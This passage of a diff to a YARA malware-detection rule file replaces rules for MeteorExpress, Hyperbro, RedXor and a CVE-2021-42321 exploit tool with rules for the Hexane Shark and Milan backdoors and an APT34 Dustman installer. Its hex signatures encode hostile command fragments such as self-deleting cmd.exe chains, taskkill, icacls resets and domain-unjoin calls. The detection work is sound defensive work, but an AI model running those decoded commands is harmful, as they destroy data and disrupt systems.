24 58 45 33 c0 33 d2 48 63 d8 e8 bf aa 6f 00 8d 4b 01 48 63 c9 e8 d4 67 6f 00 4c 8b 4c 24 58 4c 8b c3 ba 01 00 00 00 48 8b c8 48 8b f0 e8 58 f5 6f 00 48 8b 4c 24 58 48 8b d8 e8 47 99 6f 00 b9 64 00 00 00 ff 15 08 8f 71 00 48 83 bf f0 03 00 00 00 75 11 b9 42 6e aa cf e8 8c e7 ff ff 48 89 87 f0 03 00 00 48 8d 4d f0 ff 97 f0 03 00 00 44 8b cb 89 5c 24 50 4c 8b c6 48 8d 54 24 50 49 8b ce e8 44 d7 5c 00 48 8b ce 85 }
+		$str1 = { 1b 30 03 00 4a 00 00 00 03 00 00 11 02 73 23 00 00 0a 0a 06 6f 24 00 00 0a 2d 3a 02 72 [1-4] 00 00 70 28 25 00 00 0a 0b 72 [1-4] 00 00 70 02 28 25 00 00 0a 28 1a 00 00 0a 06 6f 26 00 00 0a 07 7e 01 00 00 04 28 05 00 00 06 2c 06 06 6f 27 00 00 0a de 03 26 de 00 2a 00 00 01 10 00 00 00 00 1b 00 2b 46 00 03 13 00 00 01 }
+		$str2 = { 1b 30 05 00 1a 01 00 00 04 00 00 11 16 0a 73 28 00 00 0a 0b 07 6f 29 00 00 0a 1e 5b 8d 2c 00 00 01 0c 07 6f 2a 00 00 0a 1e 5b 8d 2c 00 00 01 0d 73 2b 00 00 0a 13 06 11 06 08 6f 2c 00 00 0a 11 06 09 6f 2c 00 00 0a de 0c 11 06 2c 07 11 06 6f 12 00 00 0a dc 08 8e 69 09 8e 69 58 8d 2c 00 00 01 13 04 08 11 04 08 8e 69 28 2d 00 00 0a 09 16 11 04 08 8e 69 09 8e 69 28 2e 00 00 0a 11 04 04 28 06 00 00 06 13 04 11 04 8e 69 28 2f 00 00 0a 13 05 07 08 09 6f 30 00 00 0a 13 07 02 19 73 31 00 00 0a 13 08 03 18 73 31 00 00 0a 13 09 11 09 11 07 17 73 32 00 00 0a 13 0a 11 09 11 05 16 11 05 8e 69 6f 33 00 00 0a 11 09 11 04 16 11 04 8e 69 6f 33 00 00 0a 11 08 11 0a 20 [4] 6f 34 00 00 0a de 30 11 0a 2c 07 11 0a 6f 12 00 00 0a dc 11 09 2c 07 11 09 6f 12 00 00 0a dc 11 08 2c 07 11 08 6f 12 00 00 0a dc 11 07 2c 07 11 07 6f 12 00 00 0a dc 17 0a de 0a 07 2c 06 07 6f 12 00 00 0a dc 06 2a 00 00 41 94 00 00 02 00 00 00 2b 00 00 00 12 00 00 00 3d 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 ae 00 00 00 2c 00 00 00 da 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 a2 00 00 00 44 00 00 00 e6 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 99 00 00 00 59 00 00 00 f2 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 90 00 00 00 6e 00 00 00 fe 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 08 00 00 00 06 01 00 00 0e 01 00 00 0a 00 00 00 00 00 00 00 }
+		$str3 = { 1b 30 03 00 24 00 00 00 05 00 00 11 73 35 00 00 0a 0a 06 03 6f 36 00 00 0a 06 02 17 6f 37 00 00 0a 0b de 0a 06 2c 06 06 6f 12 00 00 0a dc 07 2a 01 10 00 00 02 00 06 00 12 18 00 0a 00 00 00 00 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 500KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 5KB and 2 of them
 }
-rule ARKBIRD_SOLG_WIP_Meteorexpress_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Shark_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect MeteorExpress/BreakWin wiper"
+		description = "Detect Shark backdoor used by Hexane group (aka Siamesekitten)"
 		author = "Arkbird_SOLG"
-		id = "6dffc8c9-ccd0-5cf3-8f3c-38adad8508b2"
-		date = "2021-08-06"
-		modified = "2021-08-07"
-		reference = "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-07/BreakWin/WIP_MeteorExpress_Aug_2021_1.yara#L1-L26"
+		id = "881dcdd9-2f4d-51d3-b046-15cdb2a2cb55"
+		date = "2021-08-18"
+		modified = "2021-08-19"
+		reference = "https://www.clearskysec.com/siamesekitten/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-19/Hexane/MAL_Shark_Aug_2021_1.yara#L1-L24"
 		license_url = "N/A"
-		logic_hash = "80e40479d699b988d1282e407edd51b5e3ea796ebf380d82f5a5aafaacafe75d"
+		logic_hash = "c14abb839f4af81a3db38719f23c47498d577a779950e66978ff14d015043490"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
-		hash1 = "2aa6e42cb33ec3c132ffce425a92dfdb5e29d8ac112631aec068c8a78314d49b"
-		hash2 = "074bcc51b77d8e35b96ed444dc479b2878bf61bf7b07e4d7bd4cf136cc3c0dce"
-		hash3 = "6709d332fbd5cde1d8e5b0373b6ff70c85fee73bd911ab3f1232bb5db9242dd4"
-		hash4 = "9b0f724459637cec5e9576c8332bca16abda6ac3fbbde6f7956bc3a97a423473"
-		tlp = "white"
-		adversary = "-"
-
-	strings:
-		$s1 = { 8d 04 2a 8b f1 3b c8 0f 42 f0 33 c9 8b c6 83 c0 01 0f 92 c1 f7 d9 0b c8 e8 42 00 00 00 53 68 18 2c 41 00 50 89 44 24 1c 89 5f 10 89 77 14 e8 aa 20 00 00 8b 74 24 1c 83 c4 0c c6 04 1e 00 83 fd 10 72 0a 8b 0f 8d 55 01 e8 50 00 00 00 5d 89 37 8b c7 5f 5e 5b 59 }
-		$s2 = { 68 cc 00 00 00 b8 [3] 00 e8 [2] 00 00 8b f1 89 75 8c 83 4d d4 ff 33 c0 83 4d d8 ff 6a 44 5f 57 50 89 45 dc 89 45 e0 8d 45 90 50 e8 [3] 00 8d 46 1c 89 7d 90 83 c4 0c 83 78 14 08 72 02 8b 00 89 45 98 8d 7d e4 33 c0 83 c6 04 ab 8b ce 83 7e 14 08 ab ab 72 02 8b 0e 8b 46 10 8d 04 41 8b ce 72 02 8b 0e ff 75 8c 33 d2 50 51 8d 4d e4 89 55 e4 89 55 e8 89 55 ec e8 [2] fd ff 33 d2 89 55 fc 8b 45 e8 89 55 88 39 45 ec 74 0d 33 c9 66 89 08 83 c0 02 89 45 e8 eb 0f 8d 4d 88 51 50 8d 4d e4 e8 3c 02 00 00 33 d2 8b 7d 8c 8d 4d d4 51 8d 4d 90 51 8b 47 34 52 52 52 52 52 52 ff 75 e4 52 ff 70 04 ff 15 08 [2] 00 85 c0 74 28 ff 75 d8 8d 4f 3c e8 [2] ff ff ff 75 d4 8d }
-		$s3 = { 8b ec 83 e4 f8 83 ec 7c a1 14 50 41 00 33 c4 89 44 24 78 8b 45 0c 8b 4d 08 89 0c 24 53 56 57 83 e8 01 0f 84 05 01 00 00 83 e8 01 0f 84 23 01 00 00 83 e8 0d 74 15 ff 75 14 ff 75 10 ff 75 0c 51 ff 15 2c e1 40 00 e9 0b 01 00 00 8d 44 24 40 c6 05 f4 63 41 00 01 50 51 ff 15 30 e1 40 00 8b d8 6a 00 89 5c 24 18 ff 15 10 e0 40 00 8b f0 8d 44 24 48 56 50 53 ff 15 28 e1 40 00 56 ff 15 0c e0 40 00 83 3d f8 63 41 00 00 0f 84 8d 00 00 00 53 ff 15 04 e0 40 00 ff 35 f8 63 41 00 89 44 24 14 50 ff 15 00 e0 40 00 8b d8 8d 44 24 18 50 6a 18 ff 35 f8 63 41 00 ff 15 14 e0 40 00 8b 7c 24 20 8d 44 24 30 8b 74 24 1c 50 ff 74 24 10 ff 15 44 e1 40 00 8b 44 24 38 2b c6 8b 74 24 10 68 20 00 cc 00 99 2b c2 6a 00 8b c8 8b 44 24 44 6a 00 56 ff 74 24 30 2b c7 d1 f9 ff 74 24 30 99 2b c2 d1 f8 50 51 ff 74 24 34 ff 15 18 e0 40 00 53 56 ff 15 00 e0 40 00 56 ff 15 08 e0 40 00 8d 44 24 40 }
-		$s4 = { 38 1b 38 26 38 2e 38 39 38 3f 38 4a 38 50 38 5e 38 67 38 6c 38 79 38 7e 38 ec 38 }
-		$s5 = { 55 8b ec 51 a1 60 57 41 00 83 f8 fe 75 0a e8 8e 0d 00 00 a1 60 57 41 00 83 f8 ff 75 07 b8 ff ff 00 00 eb 1b 6a 00 8d 4d fc 51 6a 01 8d 4d 08 51 50 ff 15 50 e0 40 00 85 c0 74 e2 66 8b 45 08 8b }
-		$s6 = { 69 63 61 63 6c 73 2e 65 78 65 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 53 79 73 74 65 6d 44 61 74 61 5c 53 2d 31 2d 35 2d 31 38 5c 52 65 61 64 4f 6e 6c 79 22 20 2f 72 65 73 65 74 20 2f 54 }
-		$s7 = { 77 6d 69 63 20 63 6f 6d 70 75 74 65 72 73 79 73 74 65 6d 20 77 68 65 72 65 20 6e 61 6d 65 3d 22 25 63 6f 6d 70 75 74 65 72 6e 61 6d 65 25 22 20 63 61 6c 6c 20 75 6e 6a 6f 69 6e 64 6f 6d 61 69 6e 6f 72 77 6f 72 6b 67 72 6f 75 70 }
-		$s8 = { 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 }
-		$s9 = { 8b 55 ?? 8d 4d ?? e8 ?? ?? fe ff c6 45 fc 08 ff 15 ?? ?? 47 00 8b d0 8d 4d ?? e8 ?? ?? fe ff c6 45 fc 09 8d 45 ?? 50 8d 45 ?? 50 8d 4d ?? e8 ?? ?? ?? ff 83 ec 0c 8b cc 89 65 ?? 51 ff 70 04 ff 30 e8 ?? ?? ?? ff c6 45 fc 0a 83 ec 18 8b cc 89 65 ?? 68 ?? ?? 48 00 e8 ?? ?? ?? ff c6 45 fc 0b c6 45 fc 09 8d }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 25KB and 4 of ( $s* )
-}
-rule ARKBIRD_SOLG_EXP_CVE_2021_42321_Nov_2021_1 : CVE_2021_42321 FILE
-{
-	meta:
-		description = "Detect CVE-2021-42321 exploit tool"
-		author = "Arkbird_SOLG"
-		id = "2efd58a1-e5c3-5596-b5fd-f6e2fe0ab620"
-		date = "2021-11-21"
-		modified = "2021-11-21"
-		reference = "https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-21/EXP_CVE_2021_42321_Nov_2021_1.yara#L1-L19"
-		license_url = "N/A"
-		logic_hash = "bf45f240875f3c3ab729fe623b6c97d0540c0d7d3e9b2e4beb88af6922f8a643"
-		score = 50
-		quality = 67
-		tags = "CVE-2021-42321, FILE"
-		hash1 = "537744916ce2e78748d301901c679307e8159101f3b194add89f6e1dfbf62c32"
-		tlp = "white"
-		level = "Experimental"
-		adversary = "-"
+		hash1 = "89ab99f5721b691e5513f4192e7c96eb0981ddb6c2d2b94c1a32e2df896397b8"
+		hash2 = "f6ae4f4373510c4e096fab84383b547c8997ccf3673c00660df8a3dc9ed1f3ca"
+		hash3 = "44faf11719b3a679e7a6dd5db40033ec4dd6e1b0361c145b81586cb735a64112"
+		hash4 = "2f2ef9e3f6db2146bd277d3c4e94c002ecaf7deaabafe6195fddabc81a8ee76c"
+		tlp = "White"
+		adversary = "Hexane"
 
 	strings:
-		$s1 = { 41 41 45 41 41 41 44 2f 2f 2f 2f 2f 41 51 41 41 41 41 41 41 41 41 41 4d 41 67 41 41 41 46 35 4e 61 57 4e 79 62 }
-		$s2 = "/ews/exchange.asmx" ascii
-		$s3 = { 48 74 74 70 4e 74 6c 6d 41 75 74 68 28 27 25 73 27 20 25 20 28 55 53 45 52 29 }
-		$s4 = { 22 55 73 65 72 2d 41 67 65 6e 74 22 3a 20 22 45 78 63 68 61 6e 67 65 53 65 72 76 69 63 65 73 43 6c 69 65 6e 74 }
-		$s5 = { 6d 56 6a 64 45 52 68 64 47 46 51 63 6d 39 32 61 57 52 6c 63 6a 34 4e 43 69 41 67 49 43 41 38 54 32 4a 71 5a 57 4e 30 52 47 46 30 59 56 42 79 62 33 5a 70 5a 47 56 79 49 48 67 36 53 32 56 35 50 53 4a 7a 5a 58 52 4e 5a 58 52 6f 62 32 51 69 49 45 39 69 61 6d 56 6a 64 45 6c 75 63 33 52 68 62 6d 4e 6c 50 53 4a 37 65 44 70 54 64 47 46 30 61 57 4d 67 59 7a 70 44 62 32 35 6d 61 57 64 31 63 6d 46 30 61 57 }
+		$s1 = { 7b 00 22 00 44 00 61 00 74 00 61 00 22 00 3a 00 5b 00 22 00 00 07 22 00 [0-8] 5d 00 7d }
+		$s2 = "application/json" fullword wide
+		$s3 = { 40 00 45 00 43 00 48 00 4f 00 20 00 4f 00 46 00 46 00 0a 00 00 1d 74 00 61 00 73 00 6b 00 6b 00 69 00 6c 00 6c 00 20 00 2f 00 49 00 4d 00 20 00 22 00 00 17 22 00 20 00 2f 00 46 00 20 00 3e 00 20 00 6e 00 75 00 6c 00 0a 00 00 2b 70 00 69 00 6e 00 67 00 20 00 [12-28] 00 20 00 6e 00 75 00 6c }
+		$s4 = { 2a 00 65 00 78 00 65 00 00 0b 2a 00 70 00 72 00 6f 00 63 00 00 07 2a 00 6b 00 6c 00 00 07 64 00 69 00 72 00 00 11 66 00 69 00 6c 00 65 00 3a 00 2f 00 2f 00 2f }
+		$s5 = { 16 0a 2b 13 02 06 02 06 91 1f 2a 28 ?? 00 00 0a 61 d2 9c 06 17 58 0a 06 02 8e 69 }
+		$s6 = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography" fullword wide
+		$s7 = { 65 00 63 00 68 00 6f 00 20 00 [2-10] 20 00 7c 00 20 00 64 00 65 00 6c 00 20 00 [2-10] 2e 00 62 00 61 00 74 00 00 0f [2-10] 00 2e 00 62 00 61 00 74 }
 
 	condition:
-		filesize > 3KB and 4 of them
+		uint16( 0 ) == 0x5A4D and filesize > 15KB and 6 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_APT27_Hyperbro_Apr_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Milan_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect Hyperbro backdoor"
+		description = "Detect Milian backdoor used by Hexane group (aka Siamesekitten)"
 		author = "Arkbird_SOLG"
-		id = "060a200e-17dd-5789-94d4-eeff5c2e9a18"
-		date = "2021-05-01"
-		modified = "2021-05-04"
-		reference = "-"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-03/APT27/APT_APT27_Hyperbro_Apr_2021_1.yara#L1-L21"
+		id = "34acac5a-6090-5a68-9afb-4da7073bed58"
+		date = "2021-08-18"
+		modified = "2021-08-19"
+		reference = "https://www.clearskysec.com/siamesekitten/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-19/Hexane/MAL_Milan_Aug_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "1a32ab7c30885a665ede66640a9b047e3c381f6f535243fcadf1a7a22e76f407"
+		logic_hash = "bad8ae2a9275bcb6e0e903fda6a128a1bed676c8e1a8e653e9fc3467766ce7fc"
 		score = 75
-		quality = 35
+		quality = 75
 		tags = "FILE"
-		hash1 = "36fad80a5f328f487b20a3f5fc5f1902d50cbb1bd9167c44b66929a1288fc6f4"
-		hash2 = "52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7"
-		hash3 = "9000ce3c0e01b6c80edb3af87aad8117513ce334135aa7d7b1c2afa067f4c4ab"
-		hash4 = "92bbcb5461ab5959e31f997a6df77995377d69f8077e43e5812fcbe9303d831c"
+		hash1 = "b46949feeda8726c0fb86d3cd32d3f3f53f6d2e6e3fcd6f893a76b8b2632b249"
+		hash2 = "4f1b8c9209fa2684aa3777353222ad1c7716910dbb615d96ffc7882eb81dd248"
 		tlp = "White"
-		adversary = "APT27"
+		adversary = "Hexane"
 
 	strings:
-		$seq1 = { 8b [5] 7? 0? [2] 0? ?? 0? [3] ff 75 0? [11] 5? [2] 0? ?? 8b }
-		$seq2 = { e8 ?? 0? 00 00 b0 01 c3 55 8b ec ff 75 08 ff 15 34 c0 00 10 85 c0 74 11 56 8b 30 50 e8 ?? 1? 00 00 8b c6 59 85 f6 75 f1 5e 5d c3 cc 8b 4c 24 0c 0f b6 44 24 08 8b d7 8b 7c 24 04 85 c9 0f 84 3c 01 00 00 69 c0 01 01 01 01 83 f9 20 0f 8e df 00 00 00 81 f9 80 00 00 00 0f 8c 8b 00 00 00 0f ba 25 b8 27 01 10 01 73 09 f3 aa 8b 44 24 04 8b fa c3 0f ba 25 10 20 01 10 01 0f 83 b2 00 00 00 66 0f 6e c0 66 }
-		$seq3 = { 8b 44 24 08 48 75 [13] be ?? 16 00 10 bb 00 10 00 10 05 [2] 00 00 2b f3 [0-3] 74 0? 8? [0-2] cf [0-4] 03 cb ?? 11 47 3b fe 72 ?? e8 ?? fd ff ff 5f 5e 5b 33 c0 40 c2 0c 00 8b ff 55 8b ec 8b 45 0c 56 57 83 f8 01 75 7c 50 e8 1c 14 00 00 59 85 c0 75 07 33 c0 e9 0e 01 00 00 e8 a6 06 00 00 85 c0 75 07 e8 32 14 00 00 eb e9 e8 af 13 00 00 ff 15 ?? 80 00 10 a3 18 b8 00 10 e8 68 12 00 00 a3 64 ac 00 10 e8 89 0c 00 00 85 c0 7d 07 e8 1f 03 00 00 eb cf e8 93 11 00 00 85 c0 7c 20 e8 12 0f 00 00 85 c0 7c 17 6a 00 e8 41 0a 00 00 59 85 c0 75 0b ff 05 60 ac 00 10 e9 a8 00 00 00 e8 a4 0e 00 00 eb c9 33 ff 3b c7 75 31 39 3d 60 ac 00 10 7e 81 ff 0d 60 ac 00 10 39 3d b4 ac 00 10 75 05 e8 d0 0b 00 00 39 7d 10 75 7b e8 77 0e 00 00 e8 bd 02 00 00 e8 a1 13 00 00 eb 6a 83 f8 02 75 59 e8 78 02 00 00 68 14 02 00 00 6a 01 e8 54 08 00 00 8b f0 59 59 3b f7 0f 84 36 ff ff ff 56 ff 35 00 a0 00 10 ff 35 7c ac 00 10 e8 d3 01 00 00 59 ff d0 85 c0 74 17 57 56 e8 b1 02 00 00 59 59 ff 15 ?? 80 00 10 83 4e 04 ff 89 06 eb 18 56 e8 3f 07 00 00 59 e9 fa fe ff ff 83 f8 03 75 07 57 e8 33 05 00 00 59 33 c0 40 5f 5e 5d c2 0c 00 6a 0c 68 d0 92 00 10 e8 ?? 15 00 00 8b f9 8b f2 8b 5d 08 33 c0 40 89 45 e4 85 f6 75 0c 39 15 60 ac 00 10 0f 84 c5 00 00 00 83 65 fc 00 3b f0 74 05 83 fe 02 75 2e a1 ?? 81 00 10 85 c0 74 08 57 56 53 ff d0 89 45 e4 83 7d e4 00 0f 84 96 00 00 00 57 56 53 e8 72 fe ff ff 89 45 e4 }
+		$c1 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 43 00 20 00 70 00 69 00 6e 00 67 00 20 00 [2-6] 2e 00 [2-6] 2e 00 [2-6] 2e 00 [2-6] 20 00 2d 00 6e 00 20 00 31 00 20 00 2d 00 77 00 20 00 [2-8] 20 00 3e 00 20 00 4e 00 75 00 6c 00 20 00 26 00 20 00 64 00 65 00 6c 00 20 00 2f 00 66 00 20 00 2f 00 71 00 20 00 22 00 25 00 73 00 22 00 20 00 26 00 20 00 77 00 61 00 69 00 74 00 66 00 6f 00 72 00 20 00 61 00 20 00 34 00 20 00 26 00 20 00 63 00 6f 00 70 00 79 00 20 00 22 00 25 00 73 00 22 00 20 00 22 00 25 00 73 00 22 00 20 00 20 00 26 00 20 00 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 52 00 75 00 6e 00 20 00 2f 00 54 00 4e 00 20 00 22 }
+		$c2 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 43 00 20 00 70 00 69 00 6e 00 67 00 20 00 [2-6] 2e 00 [2-6] 2e 00 [2-6] 2e 00 [2-6] 20 00 2d 00 6e 00 20 00 31 00 20 00 2d 00 77 00 20 00 [2-8] 20 00 3e 00 20 00 4e 00 75 00 6c 00 20 00 26 00 20 00 72 00 6d 00 64 00 69 00 72 00 20 00 2f 00 73 00 20 00 2f 00 71 00 20 00 22 00 25 00 73 00 22 00 20 00 26 00 20 00 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00 20 00 2f 00 64 00 65 00 6c 00 65 00 74 00 65 00 20 00 2f 00 74 00 6e }
+		$s1 = { 2d 2d 2d 2d 2d 2d [1-8] 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 6e 61 6d 65 3d 22 25 73 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 25 73 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f }
+		$s2 = { 5b 00 25 00 64 00 3a 00 25 00 64 00 3a 00 25 00 64 00 3a 00 25 00 64 00 28 00 25 00 64 00 29 00 5d }
+		$s3 = { 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 2d 00 54 00 79 00 70 00 65 00 3a 00 20 00 6d 00 75 00 6c 00 74 00 69 00 70 00 61 00 72 00 74 00 2f 00 66 00 6f 00 72 00 6d 00 2d 00 64 00 61 00 74 00 61 00 3b 00 20 00 62 00 6f 00 75 00 6e 00 64 00 61 00 72 00 79 00 3d 00 2d 00 2d 00 2d 00 2d}
+		$s4 = { 8d 8d 7c ee ff ff 51 6a 00 6a 00 50 ff 15 ?? b2 4b 00 85 c0 0f 84 a9 0f 00 00 8d 85 e0 fb ff ff 50 e8 ?? e0 ff ff 59 50 8d 85 e0 fb ff ff 50 8d 4b 20 e8 [2] 00 00 6a 00 ff b5 94 ee ff ff 8d 85 e0 fb ff ff 50 ff 33 ff 15 ?? b2 4b 00 8b d0 89 95 e8 ee ff ff 85 d2 0f 84 65 0f 00 00 6a 02 5e 33 c9 b8 00 00 80 00 39 b5 88 ee ff ff 0f 44 c8 83 bd 94 ef ff ff 08 51 8d 85 80 ef ff ff 0f 43 85 80 ef ff ff 33 c9 51 51 51 ff b5 a8 ee ff ff 50 52 ff 15 ?? b2 4b 00 8b f0 89 b5 48 ef ff ff 85 f6 0f 84 fb 0e 00 00 80 7b 04 00 8b 3d ?? b2 4b 00 75 23 6a 02 58 39 85 88 ee ff ff 75 18 6a 04 8d 85 20 ef ff ff c7 85 20 ef ff ff 00 31 00 00 50 6a 1f 56 ff d7 c6 85 47 ef ff ff 00 33 c9 c7 85 f0 ee ff ff 18 00 00 00 8b c1 41 89 8d 20 ef ff ff 83 f8 03 0f 83 88 0e 00 00 83 bb d8 00 00 00 00 76 31 8d 83 c8 00 00 00 83 78 14 08 72 02 8b 00 68 00 00 00 01 ff b3 d8 00 00 00 50 56 ff 15 b8 b2 4b 00 85 c0 75 0c ff 15 40 b0 4b 00 89 83 f8 00 00 00 8d b3 a8 00 00 00 83 7e 10 00 76 7a 68 ?? b9 4c 00 8d 8d 98 ef ff ff e8 [2] 00 00 6a ff 33 c0 8d 8d 98 ef ff ff 6a 00 40 56 88 45 fc e8 [2] 00 00 83 bd ac ef ff ff 08 8d 85 98 ef ff ff 8b b5 48 ef ff ff 0f 43 85 98 ef ff ff 68 00 00 00 01 ff b5 a8 ef ff ff 50 56 ff 15 b8 b2 4b 00 85 c0 75 0c ff 15 40 b0 4b 00 89 83 f8 }
+		$s5 = { 6a 00 ff b5 40 ef ff ff ff b3 88 01 00 00 ff 15 30 b0 4b 00 50 57 6a ff 56 8b b5 48 ef ff ff 56 ff 15 ?? b2 4b 00 85 c0 0f 85 b2 02 00 00 8d bd 00 ef ff ff ab ab ab ab 8d 85 00 ef ff ff 50 ff 15 ?? b2 4b 00 85 c0 0f 84 74 02 00 00 8b 95 04 ef ff ff 85 d2 0f 84 4f 01 00 00 33 c0 8d bd b8 ee ff ff 6a 06 59 f3 ab 83 a5 c8 ee ff ff 00 8d bd f4 ee ff ff 83 a5 c4 ee ff ff 00 40 89 85 bc ee ff ff 89 85 cc ee ff ff 33 c0 ab c7 85 b8 ee ff ff 03 00 00 00 89 95 c0 ee ff ff ab ab 8d 43 08 83 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 10KB and 2 of ( $seq* )
+		uint16( 0 ) == 0x5A4D and filesize > 15KB and 1 of ( $c* ) and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Redxor_Feb_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_APT34_Dustman_Apr_2021_1 : FILE
 {
 	meta:
-		description = "Detect RedXor backdoor (Feb 2021)"
+		description = "Detect the Installer of Dustman wiper used by APT34"
 		author = "Arkbird_SOLG"
-		id = "10ae10b7-b351-5dda-9408-aa01a40e3d6a"
-		date = "2021-03-14"
-		modified = "2021-05-24"
-		reference = "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-23/RedXor/MAL_RedXor_Feb_2021_1.yara#L1-L20"
+		id = "071063f5-d2a4-5666-a8c4-283c02061f6d"
+		date = "2021-04-28"
+		modified = "2021-04-30"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-29/APT34/APT_APT34_Dustman_Apr_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "b4e3ea24bb19abe7065ed5fc94f65e68ea84b11da7b45936ee991ef6aac6d33d"
+		logic_hash = "44e68fa21c1d6258bc9c0dcdc9cc531a15081122c90b23607bcfda716471aeb6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "0423258b94e8a9af58ad63ea493818618de2d8c60cf75ec7980edcaa34dcc919"
-		hash2 = "0a76c55fa88d4c134012a5136c09fb938b4be88a382f88bf2804043253b0559"
-		tlp = "White"
-		adversary = "Winnti"
+		hash1 = "a9397eb9e95087db7e03239c689776d56c1450d685568564acd90e1532c78882"
+		tlp = "white"
+		adversary = "APT34"
 
 	strings:
-		$seq1 = { 0f b7 05 [2] 20 00 66 85 c0 0f 85 cd 00 00 00 48 8d 85 ?? ff ff ff be 10 00 00 00 48 89 c7 e8 [2] ff ff 66 c7 85 ?? ff ff ff 02 00 0f b7 05 [2] 20 00 0f b7 c0 89 c7 e8 [2] ff ff 66 89 85 ?? ff ff ff 48 8b 45 d8 48 89 c7 e8 [2] ff ff 89 85 ?? ff ff ff ba 00 00 00 00 be 01 00 00 00 bf 02 00 00 00 e8 [2] ff ff 89 85 ?? ff ff ff 83 bd ?? ff ff ff ff 75 21 8b 85 ?? ff ff ff 89 c7 e8 [2] ff ff bf 0a 00 00 00 e8 [2] ff ff b8 00 00 00 }
-		$seq2 = { 48 8d 8d ?? ff ff ff 8b 85 ?? ff ff ff ba 10 00 00 00 48 89 ce 89 c7 e8 [2] ff ff 83 f8 ff 75 47 8b 85 ?? ff ff ff 89 c7 e8 [2] ff ff bf 0a 00 00 00 e8 [2] ff ff b8 00 00 00 }
-		$seq3 = { 48 8d 85 [2] fd ff be 00 10 00 00 48 89 c7 e8 [2] ff ff b9 [2] 40 00 48 8b 95 [2] fd ff 48 8d 85 [2] fd ff 48 89 ce 48 89 c7 b8 00 00 00 00 e8 [2] ff ff 48 8d 85 [2] fd ff 48 89 c7 e8 [2] ff ff 89 85 30 ff ff ff 8b 85 30 ff ff ff 48 63 d8 8b 85 30 ff ff ff 48 63 c8 48 8d 95 [2] fd ff 48 8d 85 [2] fe ff 49 89 d8 be [2] 40 00 48 89 c7 e8 [2] ff ff 89 85 2c ff ff ff 8b 85 2c ff ff ff 48 63 d0 48 8d 9d [2] fe ff 8b 85 ?? ff ff ff b9 00 00 00 00 48 89 de 89 c7 e8 [2] ff ff 48 83 f8 ff 75 21 8b 85 ?? ff ff ff 89 c7 e8 [2] ff ff bf 0a 00 00 00 e8 [2] ff ff b8 00 00 00 }
